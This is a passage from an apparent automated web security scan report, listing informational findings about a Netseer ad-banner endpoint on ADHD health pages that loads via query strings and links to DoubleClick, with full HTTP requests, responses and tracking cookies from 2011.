                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.18060718476772308&cpos=8&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p8_r3_c8">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p9_r3_c9">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd96aac516b51c8&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=About+Depression&chash=-7096360666651597841&cscr=0.04372575879096985&cpos=9&creg=0&cnads=20&cpc=5.110000133514404&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p9_r3_c9">
                                       About Depression
                                       </a>
...[SNIP]...

18.59. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.03889354318380356&cpos=5&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.15707257390022278&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14457887411117554&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11372934281826019&cpos=1&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Anxiety+Disorders&chash=-6951107852935100273&cscr=0.004723768215626478&cpos=4&creg=0&cnads=20&cpc=2.069999933242798&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Anxiety+Symptoms&chash=-5823452138103537883&cscr=0.00522823678329587&cpos=6&creg=0&cnads=20&cpc=2.4600000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=101352252258050
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276202617,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3febd4f4c312660a,1311276467604,&1091,990,www.lifescript.com,6,2,1,imp3fe01b3dd0c290bb,1311276297328,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:27:47 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:27:47 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276467605,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,0,0"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:27:47 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:27:47 GMT
Content-Length: 9174

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11372934281826019&cpos=1&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p1_r1_c1">
                                       ADHD in Adults
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r1_c2">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.15707257390022278&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p2_r1_c2">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r1_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14457887411117554&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p3_r1_c3">
                                       ADHD Treatment
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r2_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Anxiety+Disorders&chash=-6951107852935100273&cscr=0.004723768215626478&cpos=4&creg=0&cnads=20&cpc=2.069999933242798&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p4_r2_c4">
                                       Anxiety Disorders
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r2_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.03889354318380356&cpos=5&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p5_r2_c5">
                                       ADHD Information
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r2_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3febd4f4c312660a&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&cvis=Anxiety+Symptoms&chash=-5823452138103537883&cscr=0.00522823678329587&cpos=6&creg=0&cnads=20&cpc=2.4600000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p6_r2_c6">
                                       Anxiety Symptoms
                                       </a>
...[SNIP]...

18.60. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd%3Bcontentid%3Dfbca8610%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Btax%3Dadhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276277305

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07161686569452286&cpos=1&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.03321396932005882&cpos=5&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.18060718476772308&cpos=6&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11105802655220032&cpos=2&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=About+Depression&chash=-7096360666651597841&cscr=0.04372575879096985&cpos=4&creg=0&cnads=20&cpc=5.110000133514404&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04673968628048897&cpos=3&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd%3Bcontentid%3Dfbca8610%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Btax%3Dadhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276277305 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=109374225633552
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276202617,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fea24c3c932bcd7,1311276272777,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276272779,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvZG9jdG9yLXJlY29tbWVuZGVkX3RpcHNfZm9yX3dvbWVuX3dpdGhfYWRoZC5hc3B4,US-TX-623-Dallas,0,0"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:24:32 GMT
Content-Length: 9217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
